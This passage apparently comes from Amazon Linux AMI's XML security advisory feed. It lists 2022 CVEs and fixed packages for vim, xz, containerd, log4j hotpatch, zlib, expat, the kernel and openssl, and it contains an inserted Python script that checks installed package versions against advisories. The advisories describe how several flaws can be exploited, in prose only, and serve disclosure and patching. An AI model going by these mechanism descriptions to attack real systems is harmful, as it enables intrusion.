CVE-2022-0413:
A flaw was found in vim. The vulnerability occurs due to using freed memory when the substitute uses a recursive function call, resulting in a use-after-free vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0392:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
CVE-2022-0361:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
CVE-2022-0359:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access with large tabstop in Ex mode, which can lead to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0318:
A flaw was found in vim. The vulnerability occurs due to reading beyond the end of a line in the utf_head_off function, which can lead to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0261:
A heap-based out-of-bounds write flaw was found in vim's ops.c. This flaw allows an attacker to trick a user into opening a crafted file, triggering an out-of-bounds write. This vulnerability can crash the application, modify memory, and possibly lead to code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0261" title="" id="CVE-2022-0261" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0318" title="" id="CVE-2022-0318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0359" title="" id="CVE-2022-0359" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0361" title="" id="CVE-2022-0361" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0392" title="" id="CVE-2022-0392" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0413" title="" id="CVE-2022-0413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0572" title="" id="CVE-2022-0572" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0943" title="" id="CVE-2022-0943" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1154" title="" id="CVE-2022-1154" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1160" title="" id="CVE-2022-1160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1381" title="" id="CVE-2022-1381" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1420" title="" id="CVE-2022-1420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-filesystem" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-8.2.4877-1.1.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.2.4877-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.2.4877" release="1.1.amzn1" epoch="2" 
arch="x86_64"><filename>Packages/vim-enhanced-8.2.4877-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.2.4877-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-8.2.4877-1.1.amzn1.noarch.rpm</filename></package><package name="vim-common" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.2.4877-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.2.4877-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.2.4877-1.1.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.2.4877-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.2.4877-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1598</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1598: important priority package update for xz</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1271:
An arbitrary file write vulnerability was found in GNU gzip's zgrep utility; the xzgrep script shipped in the xz package shares the flawed code, which is why the fix is delivered in this xz update. When zgrep is run on an attacker-chosen file name, it can write attacker-controlled content to an arbitrary attacker-selected file. The flaw occurs because of insufficient validation when processing file names containing two or more newlines: both the content to write and the target file name are embedded in the crafted multi-line file name. This allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271" title="" id="CVE-2022-1271" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xz-lzma-compat" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-lzma-compat-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz-libs" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-libs-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz-compat-libs" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-compat-libs-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz-debuginfo" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-debuginfo-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz-devel" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-devel-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz-debuginfo" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-debuginfo-5.2.2-1.14.amzn1.i686.rpm</filename></package><package name="xz-devel" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-devel-5.2.2-1.14.amzn1.i686.rpm</filename></package><package name="xz" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-5.2.2-1.14.amzn1.i686.rpm</filename></package><package name="xz-lzma-compat" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-lzma-compat-5.2.2-1.14.amzn1.i686.rpm</filename></package><package name="xz-compat-libs" version="5.2.2" release="1.14.amzn1" epoch="0" 
arch="i686"><filename>Packages/xz-compat-libs-5.2.2-1.14.amzn1.i686.rpm</filename></package><package name="xz-libs" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-libs-5.2.2-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1600</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1600: medium priority package update for containerd</title><issued date="2022-06-06 19:52:00" /><updated date="2022-06-09 19:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-31030:
A bug was found in containerd's CRI implementation where programs inside a container can cause the containerd daemon to consume memory without bound during invocation of the ExecSync API. This can cause containerd to consume all available memory on the computer, denying service to other legitimate workloads. Kubernetes and crictl can both be configured to use containerd's CRI implementation; ExecSync may be used when running probes or when executing processes via an exec facility.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31030" title="" id="CVE-2022-31030" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-debuginfo" version="1.4.13" release="3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.13-3.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.13" release="3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.13-3.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.13" release="3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.13-3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1601</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1601: important priority package update for log4j-cve-2021-44228-hotpatch</title><issued date="2022-06-13 16:56:00" /><updated date="2022-07-08 12:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-33915:
Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.
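Added worked example (not part of this advisory feed, and not yum's code): a minimal reader for this updateinfo.xml format that answers the question the paragraph above raises, namely whether the installed build is at or above the fixed one. It carries a simplified port of rpm's version comparison (tilde and caret ordering omitted), compares epoch, version and release in that order, and runs against a constructed updateinfo document built from three advisories on this page (one package each) and a constructed list of installed packages. The installed versions are assumptions for illustration.

```python
import re
import xml.etree.ElementTree as ET


def _segments(s):
    """Split a version string into the numeric and alphabetic runs rpm
    compares; separators such as '.', '-' and '_' are skipped."""
    return re.findall(r"[0-9]+|[A-Za-z]+", s)


def rpmvercmp(a, b):
    """Simplified port of rpm's rpmvercmp(): 1 if a is newer than b, -1 if
    older, 0 if equal.  Tilde and caret ordering are not implemented."""
    if a == b:
        return 0
    sa, sb = _segments(a), _segments(b)
    for x, y in zip(sa, sb):
        if x.isdigit() and y.isdigit():
            x, y = int(x), int(y)                # numeric runs compare as numbers
        elif x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1      # a numeric run beats an alpha run
        if x != y:
            return 1 if x > y else -1
    # every shared run matched: whichever side has runs left over is newer
    return (len(sa) > len(sb)) - (len(sb) > len(sa))


def evr_compare(a, b):
    """Compare (epoch, version, release) triples the way rpm and yum do."""
    for x, y in zip(a, b):
        c = rpmvercmp(x, y)
        if c:
            return c
    return 0


def advisories(xml_bytes, arch):
    """Yield (advisory id, severity, package name, fixed EVR) for one arch."""
    root = ET.fromstring(xml_bytes)
    for upd in root.iter("update"):
        adv, sev = upd.findtext("id"), upd.findtext("severity")
        for pkg in upd.iter("package"):
            if pkg.get("arch") in (arch, "noarch"):
                fixed = (pkg.get("epoch", "0"), pkg.get("version"), pkg.get("release"))
                yield adv, sev, pkg.get("name"), fixed


def find_missing_updates(xml_bytes, installed, arch):
    """Return the advisories whose fixed package is newer than what is installed.

    `installed` maps package name to an (epoch, version, release) triple, as
    rpm -q --qf '%{EPOCH} %{VERSION} %{RELEASE}' prints them (rpm prints
    '(none)' for an unset epoch; map that to '0' before calling).
    """
    missing = []
    for adv, sev, name, fixed in advisories(xml_bytes, arch):
        have = installed.get(name)
        if have is not None and evr_compare(have, fixed) == -1:
            missing.append({"advisory": adv, "severity": sev, "package": name,
                            "installed": have, "fixed": fixed})
    return missing


def build_sample_updateinfo():
    """Constructed updateinfo document modelled on this page (one package per
    advisory, built with ElementTree rather than pasted as markup)."""
    root = ET.Element("updates")

    def add(adv, sev, name, epoch, version, release, arch):
        upd = ET.SubElement(root, "update", status="final", type="security")
        ET.SubElement(upd, "id").text = adv
        ET.SubElement(upd, "severity").text = sev
        coll = ET.SubElement(ET.SubElement(upd, "pkglist"), "collection", short="amazon-linux-ami")
        pkg = ET.SubElement(coll, "package", name=name, version=version,
                            release=release, epoch=epoch, arch=arch)
        ET.SubElement(pkg, "filename").text = "Packages/%s-%s-%s.%s.rpm" % (name, version, release, arch)

    add("ALAS-2022-1601", "important", "log4j-cve-2021-44228-hotpatch", "0", "1.3", "5.amzn1", "noarch")
    add("ALAS-2022-1593", "medium", "python27", "0", "2.7.18", "2.142.amzn1", "x86_64")
    add("ALAS-2022-1597", "important", "vim-enhanced", "2", "8.2.4877", "1.1.amzn1", "x86_64")
    return ET.tostring(root)


# Constructed installed set (assumption for illustration, not a real host).
SAMPLE_INSTALLED = {
    "log4j-cve-2021-44228-hotpatch": ("0", "1.3", "4.amzn1"),   # one build behind the fix
    "python27": ("0", "2.7.18", "2.142.amzn1"),                 # already at the fixed build
    "vim-enhanced": ("1", "8.2.4877", "1.1.amzn1"),             # same version, lower epoch
}


if __name__ == "__main__":
    for m in find_missing_updates(build_sample_updateinfo(), SAMPLE_INSTALLED, "x86_64"):
        print("%s (%s): %s installed %s:%s-%s, fixed in %s:%s-%s"
              % ((m["advisory"], m["severity"], m["package"]) + m["installed"] + m["fixed"]))
```

The vim-enhanced entry is the case worth remembering: version and release match the advisory exactly, yet the package is still flagged because the advisory's epoch is 2 and the installed epoch is 1. Any check that compares only version-release strings misses that.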
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33915" title="" id="CVE-2022-33915" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="log4j-cve-2021-44228-hotpatch" version="1.3" release="5.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-cve-2021-44228-hotpatch-1.3-5.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1602</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1602: important priority package update for zlib</title><issued date="2022-06-30 23:38:00" /><updated date="2022-07-07 00:02:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-25032:
An out-of-bounds access flaw was found in zlib, which allows memory corruption when deflating (ex: when compressing) if the input has many distant matches. For some rare inputs with a large number of distant matches (crafted payloads), the buffer into which the compressed or deflated data is written can overwrite the distance symbol table which it overlays. This issue results in corrupted output due to invalid distances, which leads to out-of-bound access, corrupting the memory and potentially crashing the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032" title="" id="CVE-2018-25032" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="minizip" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/minizip-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="minizip-devel" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/minizip-devel-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="zlib" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="zlib-devel" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-devel-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="zlib-static" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-static-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="zlib-debuginfo" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-debuginfo-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="zlib-debuginfo" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-debuginfo-1.2.8-7.19.amzn1.i686.rpm</filename></package><package name="zlib" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-1.2.8-7.19.amzn1.i686.rpm</filename></package><package name="zlib-devel" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-devel-1.2.8-7.19.amzn1.i686.rpm</filename></package><package name="minizip" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/minizip-1.2.8-7.19.amzn1.i686.rpm</filename></package><package name="minizip-devel" version="1.2.8" release="7.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/minizip-devel-1.2.8-7.19.amzn1.i686.rpm</filename></package><package name="zlib-static" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-static-1.2.8-7.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1603</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1603: medium priority package update for expat</title><issued date="2022-06-30 23:38:00" /><updated date="2022-07-07 00:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-22827:
storeAtts in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2022-22826:
nextScaffoldPart in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2022-22825:
lookup in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2022-22824:
defineAttribute in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2022-22823:
build_model in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2022-22822:
addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2021-46143:
In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46143" title="" id="CVE-2021-46143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22822" title="" id="CVE-2022-22822" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22823" title="" id="CVE-2022-22823" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22824" title="" id="CVE-2022-22824" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22825" title="" id="CVE-2022-22825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22826" title="" id="CVE-2022-22826" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22827" title="" id="CVE-2022-22827" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-devel" version="2.1.0" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-14.31.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-14.31.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-14.31.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-14.31.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-14.31.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="14.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/expat-2.1.0-14.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1604</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1604: important priority package update for kernel</title><issued date="2022-06-30 23:38:00" /><updated date="2025-03-13 20:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-49349:
In the Linux kernel, the following vulnerability has been resolved:
ext4: fix use-after-free in ext4_rename_dir_prepare
CVE-2022-32981:
An issue was discovered in the Linux kernel through 5.18.3 on powerpc 32-bit platforms. There is a buffer overflow in ptrace PEEKUSER and POKEUSER (aka PEEKUSR and POKEUSR) when accessing floating point registers.
CVE-2022-32296:
The Linux kernel before 5.17.9 allows TCP servers to identify clients by observing what source ports are used.
CVE-2022-32250:
net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free.
CVE-2022-1966:
A use-after-free vulnerability was found in the Linux kernel's Netfilter subsystem in net/netfilter/nf_tables_api.c. This flaw allows a local attacker with user access to cause a privilege escalation issue.
CVE-2022-1184:
A use-after-free flaw was found in fs/ext4/namei.c:dx_insert_block() in the Linux kernel's filesystem sub-component. This flaw allows a local attacker with a user privilege to cause a denial of service.
CVE-2022-1012:
Due to the small table perturb size, a memory leak flaw was found in the Linux kernel's TCP source port generation algorithm in the net/ipv4/tcp.c function. This flaw allows an attacker to leak information and may cause a denial of service.
CVE-2022-0812:
An information leak flaw was found in NFS over RDMA in the net/sunrpc/xprtrdma/rpc_rdma.c function in RPCRDMA_HDRLEN_MIN (7) (in rpcrdma_max_call_header_size, rpcrdma_max_reply_header_size). This flaw allows an attacker with normal user privileges to leak kernel information.
CVE-2022-0494:
A kernel information leak flaw was identified in the scsi_ioctl function in drivers/scsi/scsi_ioctl.c in the Linux kernel. This flaw allows a local attacker with a special user privilege (CAP_SYS_ADMIN or CAP_SYS_RAWIO) to create issues with confidentiality.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0494" title="" id="CVE-2022-0494" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0812" title="" id="CVE-2022-0812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1012" title="" id="CVE-2022-1012" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1184" title="" id="CVE-2022-1184" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1966" title="" id="CVE-2022-1966" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32250" title="" id="CVE-2022-32250" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32296" title="" id="CVE-2022-32296" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32981" title="" id="CVE-2022-32981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49349" title="" id="CVE-2022-49349" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package 
name="perf" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.285" release="147.501.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-headers-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.285-147.501.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1605</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1605: medium priority package update for openssl</title><issued date="2022-06-30 23:38:00" /><updated date="2022-07-06 23:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1292:
The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292" title="" id="CVE-2022-1292" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.158.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.158.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.158.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.158.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.158.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.158.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.158.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.158.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.158.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.158.amzn1" epoch="1" 
